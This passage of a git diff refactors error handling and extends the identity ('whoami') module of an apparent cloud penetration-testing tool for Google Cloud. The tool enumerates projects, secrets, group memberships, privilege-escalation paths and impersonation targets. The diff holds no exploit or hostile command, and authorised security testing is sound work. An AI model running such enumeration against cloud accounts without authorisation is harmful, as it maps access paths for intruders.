!= nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing forwarding rules: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, + fmt.Sprintf("Could not list forwarding rules in project %s", projectID)) } } @@ -294,9 +296,9 @@ func (m *NetworkExposureModule) findExposedLoadBalancers(ctx context.Context, pr func (m *NetworkExposureModule) findExposedCloudRun(ctx context.Context, projectID string, logger internal.Logger) { runService, err := run.NewService(ctx) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error creating Cloud Run service: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, + fmt.Sprintf("Could not create Cloud Run service in project %s", projectID)) return } @@ -304,9 +306,9 @@ func (m *NetworkExposureModule) findExposedCloudRun(ctx context.Context, project parent := fmt.Sprintf("projects/%s/locations/-", projectID) resp, err := runService.Projects.Locations.Services.List(parent).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing Cloud Run services: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) return } @@ -403,8 +405,10 @@ func (m *NetworkExposureModule) analyzeFirewallExposure(ctx context.Context, pro return nil }) - if err != nil && globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing firewall rules: %v", err), GCP_NETWORKEXPOSURE_MODULE_NAME) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKEXPOSURE_MODULE_NAME, + fmt.Sprintf("Could not list firewall rules in project %s", projectID)) } } diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go index 23cd9e5a..6d8f750b 100644 --- a/gcp/commands/networktopology.go +++ b/gcp/commands/networktopology.go @@ -303,9 +303,9 @@ func (m *NetworkTopologyModule) enumerateNetworks(ctx context.Context, projectID }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing networks for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list networks in project %s", projectID)) } // Check for Shared VPC host project @@ -352,9 +352,9 @@ func (m *NetworkTopologyModule) enumerateSubnets(ctx context.Context, projectID }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing subnets for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list subnets in project %s", projectID)) } } @@ -404,9 +404,9 @@ func (m *NetworkTopologyModule) enumerateRoutes(ctx context.Context, projectID s }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing routes for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list routes in project %s", projectID)) } } @@ -454,9 +454,9 @@ func (m *NetworkTopologyModule) enumerateCloudNAT(ctx context.Context, projectID }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing Cloud NAT for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list Cloud NAT in project %s", projectID)) } } @@ -491,9 +491,9 @@ func (m *NetworkTopologyModule) checkSharedVPCHost(ctx context.Context, projectI return nil }) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing XPN resources for project %s: %v", projectID, err), GCP_NETWORKTOPOLOGY_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_NETWORKTOPOLOGY_MODULE_NAME, + fmt.Sprintf("Could not list XPN resources in project %s", projectID)) } // Mark host networks diff --git a/gcp/commands/notebooks.go b/gcp/commands/notebooks.go index 10f4f9fc..96d40665 100644 --- a/gcp/commands/notebooks.go +++ b/gcp/commands/notebooks.go @@ -90,9 +90,9 @@ func (m *NotebooksModule) processProject(ctx context.Context, projectID string, // Get instances instances, err := svc.ListInstances(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list notebook instances: %v", err), globals.GCP_NOTEBOOKS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_NOTEBOOKS_MODULE_NAME, + fmt.Sprintf("Could not list notebook instances in project %s", projectID)) } else { m.mu.Lock() m.Instances = append(m.Instances, instances...) diff --git a/gcp/commands/orgpolicies.go b/gcp/commands/orgpolicies.go index b3bc8fd4..707aedff 100644 --- a/gcp/commands/orgpolicies.go +++ b/gcp/commands/orgpolicies.go @@ -104,9 +104,8 @@ func (m *OrgPoliciesModule) processProject(ctx context.Context, projectID string policies, err := svc.ListProjectPolicies(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating org policies in project %s: %v", projectID, err), globals.GCP_ORGPOLICIES_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_ORGPOLICIES_MODULE_NAME, + fmt.Sprintf("Could not enumerate org policies in project %s", projectID)) return } diff --git a/gcp/commands/permissions.go b/gcp/commands/permissions.go index da5d6b5d..c35e8ef1 100644 --- a/gcp/commands/permissions.go +++ b/gcp/commands/permissions.go @@ -280,9 +280,8 @@ func (m *PermissionsModule) processProject(ctx context.Context, projectID string entityPerms, groupInfos, err := iamService.GetAllEntityPermissionsWithGroupExpansion(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating permissions in project %s: %v", projectID, err), globals.GCP_PERMISSIONS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_PERMISSIONS_MODULE_NAME, + fmt.Sprintf("Could not enumerate permissions in project %s", projectID)) return } diff --git a/gcp/commands/privesc.go b/gcp/commands/privesc.go index 4a0d6f3b..f974cd95 100644 --- a/gcp/commands/privesc.go +++ b/gcp/commands/privesc.go @@ -104,9 +104,8 @@ func (m *PrivescModule) processProject(ctx context.Context, projectID string, lo paths, err := svc.AnalyzeProjectPrivesc(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error analyzing project %s: %v", projectID, err), globals.GCP_PRIVESC_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_PRIVESC_MODULE_NAME, + fmt.Sprintf("Could not analyze privilege escalation in project %s", projectID)) return } diff --git a/gcp/commands/publicresources.go b/gcp/commands/publicresources.go index ac3d8d77..641f2beb 100644 --- a/gcp/commands/publicresources.go +++ b/gcp/commands/publicresources.go @@ -124,9 +124,9 @@ func (m *PublicResourcesModule) processProject(ctx context.Context, projectID st svc := publicresourcesservice.New() resources, err := svc.EnumeratePublicResources(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error scanning project %s: %v", projectID, err), globals.GCP_PUBLICRESOURCES_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBLICRESOURCES_MODULE_NAME, + fmt.Sprintf("Could not enumerate public resources in project %s", projectID)) return } diff --git a/gcp/commands/pubsub.go b/gcp/commands/pubsub.go index 12d7aa37..e2ee5517 100644 --- a/gcp/commands/pubsub.go +++ b/gcp/commands/pubsub.go @@ -141,9 +141,8 @@ func (m *PubSubModule) processProject(ctx context.Context, projectID string, log topics, err := ps.Topics(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating Pub/Sub topics in project %s: %v", projectID, err), globals.GCP_PUBSUB_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub topics in project %s", projectID)) } else { m.mu.Lock() m.Topics = append(m.Topics, topics...) @@ -157,9 +156,8 @@ func (m *PubSubModule) processProject(ctx context.Context, projectID string, log subs, err := ps.Subscriptions(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating Pub/Sub subscriptions in project %s: %v", projectID, err), globals.GCP_PUBSUB_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_PUBSUB_MODULE_NAME, + fmt.Sprintf("Could not enumerate Pub/Sub subscriptions in project %s", projectID)) } else { m.mu.Lock() m.Subscriptions = append(m.Subscriptions, subs...) diff --git a/gcp/commands/resourcegraph.go b/gcp/commands/resourcegraph.go index 1550d722..4e3ae3c6 100644 --- a/gcp/commands/resourcegraph.go +++ b/gcp/commands/resourcegraph.go @@ -227,9 +227,9 @@ func (m *ResourceGraphModule) processProject(ctx context.Context, projectID stri break } if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing assets for project %s: %v", projectID, err), GCP_RESOURCEGRAPH_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_RESOURCEGRAPH_MODULE_NAME, + fmt.Sprintf("Could not enumerate assets in project %s", projectID)) break } diff --git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 76b1a595..3637fd8e 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -130,9 +130,8 @@ func (m *SchedulerModule) processProject(ctx context.Context, projectID string, jobs, err := ss.Jobs(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating Scheduler jobs in project %s: %v", projectID, err), globals.GCP_SCHEDULER_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_SCHEDULER_MODULE_NAME, + fmt.Sprintf("Could not enumerate Scheduler jobs in project %s", projectID)) return } diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index 95b729ee..74955813 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -127,9 +127,8 @@ func (m *SecretsModule) processProject(ctx context.Context, projectID string, lo secrets, err := ss.Secrets(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating secrets in project %s: %v", projectID, err), globals.GCP_SECRETS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_SECRETS_MODULE_NAME, + fmt.Sprintf("Could not enumerate secrets in project %s", projectID)) return } diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go index 6e247679..a2b28476 100644 --- a/gcp/commands/securitycenter.go +++ b/gcp/commands/securitycenter.go @@ -204,9 +204,9 @@ func (m *SecurityCenterModule) processProject(ctx context.Context, projectID str break } if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error listing findings for project %s: %v", projectID, err), GCP_SECURITYCENTER_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_SECURITYCENTER_MODULE_NAME, + fmt.Sprintf("Could not enumerate findings in project %s", projectID)) break } diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index ae314a31..643c4445 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -147,9 +147,8 @@ func (m *ServiceAccountsModule) processProject(ctx context.Context, projectID st serviceAccounts, err = iamService.ServiceAccounts(projectID) if err != nil { m.CommandCounter.Error++ - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error enumerating service accounts in project %s: %v", projectID, err), globals.GCP_SERVICEACCOUNTS_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_SERVICEACCOUNTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate service accounts in project %s", projectID)) return } } diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go index 822ed32e..d5780797 100644 --- a/gcp/commands/sourcerepos.go +++ b/gcp/commands/sourcerepos.go @@ -109,9 +109,9 @@ func (m *SourceReposModule) processProject(ctx context.Context, projectID string svc := sourcereposservice.New() repos, err := svc.ListRepos(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list repos in project %s: %v", projectID, err), globals.GCP_SOURCEREPOS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SOURCEREPOS_MODULE_NAME, + fmt.Sprintf("Could not list repos in project %s", projectID)) return } diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go index 17bad93c..041ae97e 100644 --- a/gcp/commands/spanner.go +++ b/gcp/commands/spanner.go @@ -73,9 +73,9 @@ func (m *SpannerModule) processProject(ctx context.Context, projectID string, lo svc := spannerservice.New() instances, err := svc.ListInstances(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list Spanner instances: %v", err), globals.GCP_SPANNER_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_SPANNER_MODULE_NAME, + fmt.Sprintf("Could not list Spanner instances in project %s", projectID)) return } diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index 830624d6..7b4de9d1 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -87,9 +87,9 @@ func (m *VPCNetworksModule) processProject(ctx context.Context, projectID string // Get networks networks, err := svc.ListVPCNetworks(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list VPC networks: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCNETWORKS_MODULE_NAME, + fmt.Sprintf("Could not list VPC networks in project %s", projectID)) } else { m.mu.Lock() m.Networks = append(m.Networks, networks...) diff --git a/gcp/commands/vpcsc.go b/gcp/commands/vpcsc.go index e2cce1fa..a433d10a 100644 --- a/gcp/commands/vpcsc.go +++ b/gcp/commands/vpcsc.go @@ -85,7 +85,9 @@ func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { // List access policies policies, err := svc.ListAccessPolicies(m.OrgID) if err != nil { - logger.ErrorM(fmt.Sprintf("Could not list access policies: %v", err), globals.GCP_VPCSC_MODULE_NAME) + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access policies for organization %s", m.OrgID)) return } m.Policies = policies @@ -99,18 +101,16 @@ func (m *VPCSCModule) Execute(ctx context.Context, logger internal.Logger) { for _, policy := range m.Policies { perimeters, err := svc.ListServicePerimeters(policy.Name) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list perimeters for policy %s: %v", policy.Name, err), globals.GCP_VPCSC_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list perimeters for policy %s", policy.Name)) } else { m.Perimeters = append(m.Perimeters, perimeters...) } levels, err := svc.ListAccessLevels(policy.Name) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.InfoM(fmt.Sprintf("Could not list access levels for policy %s: %v", policy.Name, err), globals.GCP_VPCSC_MODULE_NAME) - } + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + fmt.Sprintf("Could not list access levels for policy %s", policy.Name)) } else { m.AccessLevels = append(m.AccessLevels, levels...) } @@ -262,6 +262,8 @@ func (m *VPCSCModule) writeOutput(ctx context.Context, logger internal.Logger) { err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, "org", []string{m.OrgID}, []string{m.OrgID}, m.Account, output) if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCSC_MODULE_NAME) + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_VPCSC_MODULE_NAME, + "Could not write output") } } diff --git a/gcp/commands/whoami.go b/gcp/commands/whoami.go index e3ec2c6f..e64f5386 100644 --- a/gcp/commands/whoami.go +++ b/gcp/commands/whoami.go @@ -13,7 +13,9 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/spf13/cobra" + cloudidentity "google.golang.org/api/cloudidentity/v1" cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" + crmv3 "google.golang.org/api/cloudresourcemanager/v3" ) // Flag for extended enumeration @@ -46,12 +48,20 @@ func init() { // ------------------------------ type IdentityContext struct { - Email string - Type string // "user" or "serviceAccount" - UniqueID string - ProjectIDs []string - Organizations []OrgInfo - Folders []FolderInfo + Email string + Type string // "user" or "serviceAccount" + UniqueID string + ProjectIDs []string // Keep for backward compatibility + Projects []ProjectInfo // New: stores project ID and display name + Organizations []OrgInfo + Folders []FolderInfo + Groups []GroupMembership // Groups the identity is a member of + GroupsEnumerated bool // Whether group enumeration was successful +} + +type ProjectInfo struct { + ProjectID string + DisplayName string } type OrgInfo struct { @@ -66,12 +76,19 @@ type FolderInfo struct { Parent string } +type GroupMembership struct { + GroupID string // e.g., "groups/abc123" + Email string // e.g., "security-team@example.com" + DisplayName string // e.g., "Security Team" +} + type RoleBinding struct { - Role string - Scope string // "organization", "folder", "project" - ScopeID string - Inherited bool - Condition string + Role string + Scope string // "organization", "folder", "project" + ScopeID string + ScopeName string // Display name of the scope resource + Inherited bool + Condition string } type ImpersonationTarget struct { @@ -179,7 +196,10 @@ func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { // Step 2: Get organization context (always run) m.getOrganizationContext(ctx, logger) - // Step 3: Get role bindings across projects (always run) + // Step 3: Get group memberships for the current identity + m.getGroupMemberships(ctx, logger) + + // Step 4: Get role bindings across projects (always run) m.getRoleBindings(ctx, logger) // Extended mode: Additional enumeration @@ -200,22 +220,42 @@ func (m *WhoAmIModule) Execute(ctx context.Context, logger internal.Logger) { // getOrganizationContext retrieves organization and folder hierarchy func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { - // Create resource manager client + // Create resource manager clients crmService, err := cloudresourcemanager.NewService(ctx) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error creating CRM client: %v", err), globals.GCP_WHOAMI_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager client") return } + // Create v3 client for fetching folder details + crmv3Service, err := crmv3.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Resource Manager v3 client") + // Continue without v3, we just won't get display names for folders + } + // Get project ancestry for each project for _, projectID := range m.ProjectIDs { + // Fetch project details to get display name + projectInfo := ProjectInfo{ + ProjectID: projectID, + } + project, err := crmService.Projects.Get(projectID).Do() + if err == nil && project != nil { + projectInfo.DisplayName = project.Name + } + m.Identity.Projects = append(m.Identity.Projects, projectInfo) + + // Get ancestry resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting ancestry for project %s: %v", projectID, err), globals.GCP_WHOAMI_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get ancestry for project %s", projectID)) continue } @@ -226,6 +266,11 @@ func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger intern OrgID: ancestor.ResourceId.Id, Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), } + // Try to get display name for organization + org, err := crmService.Organizations.Get(orgInfo.Name).Do() + if err == nil && org != nil { + orgInfo.DisplayName = org.DisplayName + } // Check if already added exists := false for _, o := range m.Identity.Organizations { @@ -238,8 +283,17 @@ func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger intern m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) } case "folder": + folderName := fmt.Sprintf("folders/%s", ancestor.ResourceId.Id) folderInfo := FolderInfo{ - Name: fmt.Sprintf("folders/%s", ancestor.ResourceId.Id), + Name: folderName, + } + // Try to get display name for folder using v3 API + if crmv3Service != nil { + folder, err := crmv3Service.Folders.Get(folderName).Do() + if err == nil && folder != nil { + folderInfo.DisplayName = folder.DisplayName + folderInfo.Parent = folder.Parent + } } // Check if already added exists := false @@ -261,6 +315,54 @@ func (m *WhoAmIModule) getOrganizationContext(ctx context.Context, logger intern } } +// getGroupMemberships retrieves the groups that the current identity is a member of +func (m *WhoAmIModule) getGroupMemberships(ctx context.Context, logger internal.Logger) { + // Only applicable for user identities (not service accounts) + if m.Identity.Type != "user" { + m.Identity.GroupsEnumerated = true // N/A for service accounts + return + } + + ciService, err := cloudidentity.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not create Cloud Identity client") + // GroupsEnumerated stays false - will show "Unknown" + return + } + + // Search for groups that the user is a direct member of + // The parent must be "groups/-" to search across all groups + query := fmt.Sprintf("member_key_id == '%s'", m.Identity.Email) + resp, err := ciService.Groups.Memberships.SearchDirectGroups("groups/-").Query(query).Do() + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + "Could not fetch group memberships") + // GroupsEnumerated stays false - will show "Unknown" + return + } + + // Successfully enumerated groups + m.Identity.GroupsEnumerated = true + + for _, membership := range resp.Memberships { + group := GroupMembership{ + GroupID: membership.Group, + DisplayName: membership.DisplayName, + } + if membership.GroupKey != nil { + group.Email = membership.GroupKey.Id + } + m.Identity.Groups = append(m.Identity.Groups, group) + } + + if len(m.Identity.Groups) > 0 { + logger.InfoM(fmt.Sprintf("Found %d group membership(s)", len(m.Identity.Groups)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + // getRoleBindings retrieves IAM role bindings for the current identity func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logger) { iamService := IAMService.New() @@ -279,9 +381,9 @@ func (m *WhoAmIModule) getRoleBindings(ctx context.Context, logger internal.Logg // Use PrincipalsWithRolesEnhanced which includes inheritance principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting IAM bindings for project %s: %v", projectID, err), globals.GCP_WHOAMI_MODULE_NAME) - } + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, + fmt.Sprintf("Could not get IAM bindings for project %s", projectID)) continue } @@ -504,16 +606,10 @@ func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { // Loot File Management // ------------------------------ func (m *WhoAmIModule) initializeLootFiles() { - m.LootMap["whoami-context"] = &internal.LootFile{ - Name: "whoami-context", - Contents: "# GCP Identity Context\n# Generated by CloudFox\n\n", - } - m.LootMap["whoami-permissions"] = &internal.LootFile{ - Name: "whoami-permissions", - Contents: "# Current Identity Permissions\n# Generated by CloudFox\n\n", - } + // Note: whoami-context and whoami-permissions loot files removed as redundant + // The same information is already saved to table/csv/json files - // Extended mode loot files + // Extended mode loot files - these contain actionable commands if m.Extended { m.LootMap["whoami-impersonation"] = &internal.LootFile{ Name: "whoami-impersonation", @@ -527,29 +623,8 @@ func (m *WhoAmIModule) initializeLootFiles() { } func (m *WhoAmIModule) generateLoot() { - // Context loot - m.LootMap["whoami-context"].Contents += fmt.Sprintf( - "Identity: %s\n"+ - "Type: %s\n"+ - "Projects: %s\n"+ - "Organizations: %d\n"+ - "Folders: %d\n\n", - m.Identity.Email, - m.Identity.Type, - strings.Join(m.Identity.ProjectIDs, ", "), - len(m.Identity.Organizations), - len(m.Identity.Folders), - ) - - // Permissions loot - for _, rb := range m.RoleBindings { - m.LootMap["whoami-permissions"].Contents += fmt.Sprintf( - "%s on %s/%s\n", - rb.Role, - rb.Scope, - rb.ScopeID, - ) - } + // Note: Context and permissions info is already saved to table/csv/json files + // Only generate loot files for extended mode (actionable commands) // Extended mode loot if m.Extended { @@ -604,10 +679,100 @@ func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) identityBody := [][]string{ {"Email", m.Identity.Email}, {"Type", m.Identity.Type}, - {"Projects", strings.Join(m.Identity.ProjectIDs, ", ")}, - {"Organizations", fmt.Sprintf("%d", len(m.Identity.Organizations))}, - {"Folders", fmt.Sprintf("%d", len(m.Identity.Folders))}, - {"Role Bindings", fmt.Sprintf("%d", len(m.RoleBindings))}, + } + + // Add project details (expanded) + for i, proj := range m.Identity.Projects { + label := "Project" + if len(m.Identity.Projects) > 1 { + label = fmt.Sprintf("Project %d", i+1) + } + if proj.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", proj.DisplayName, proj.ProjectID)}) + } else { + identityBody = append(identityBody, []string{label, proj.ProjectID}) + } + } + if len(m.Identity.Projects) == 0 { + identityBody = append(identityBody, []string{"Projects", "0"}) + } + + // Add organization details (expanded) + for i, org := range m.Identity.Organizations { + label := "Organization" + if len(m.Identity.Organizations) > 1 { + label = fmt.Sprintf("Organization %d", i+1) + } + if org.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", org.DisplayName, org.OrgID)}) + } else { + identityBody = append(identityBody, []string{label, org.OrgID}) + } + } + if len(m.Identity.Organizations) == 0 { + identityBody = append(identityBody, []string{"Organizations", "0"}) + } + + // Add folder details (expanded) + for i, folder := range m.Identity.Folders { + label := "Folder" + if len(m.Identity.Folders) > 1 { + label = fmt.Sprintf("Folder %d", i+1) + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + if folder.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", folder.DisplayName, folderID)}) + } else { + identityBody = append(identityBody, []string{label, folderID}) + } + } + if len(m.Identity.Folders) == 0 { + identityBody = append(identityBody, []string{"Folders", "0"}) + } + + // Add group membership details (expanded) + for i, group := range m.Identity.Groups { + label := "Group" + if len(m.Identity.Groups) > 1 { + label = fmt.Sprintf("Group %d", i+1) + } + if group.DisplayName != "" && group.Email != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", group.DisplayName, group.Email)}) + } else if group.Email != "" { + identityBody = append(identityBody, []string{label, group.Email}) + } else if group.DisplayName != "" { + identityBody = append(identityBody, []string{label, group.DisplayName}) + } else { + identityBody = append(identityBody, []string{label, group.GroupID}) + } + } + if len(m.Identity.Groups) == 0 { + if m.Identity.GroupsEnumerated { + identityBody = append(identityBody, []string{"Groups", "0"}) + } else { + identityBody = append(identityBody, []string{"Groups", "Unknown (permission denied)"}) + } + } + + // Add role binding details (expanded) + for i, rb := range m.RoleBindings { + label := "Role Binding" + if len(m.RoleBindings) > 1 { + label = fmt.Sprintf("Role Binding %d", i+1) + } + // Format: Role -> Scope (ScopeID) + scopeDisplay := rb.ScopeID + if rb.ScopeName != "" { + scopeDisplay = fmt.Sprintf("%s (%s)", rb.ScopeName, rb.ScopeID) + } + inheritedStr := "" + if rb.Inherited { + inheritedStr = " [inherited]" + } + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s on %s/%s%s", rb.Role, rb.Scope, scopeDisplay, inheritedStr)}) + } + if len(m.RoleBindings) == 0 { + identityBody = 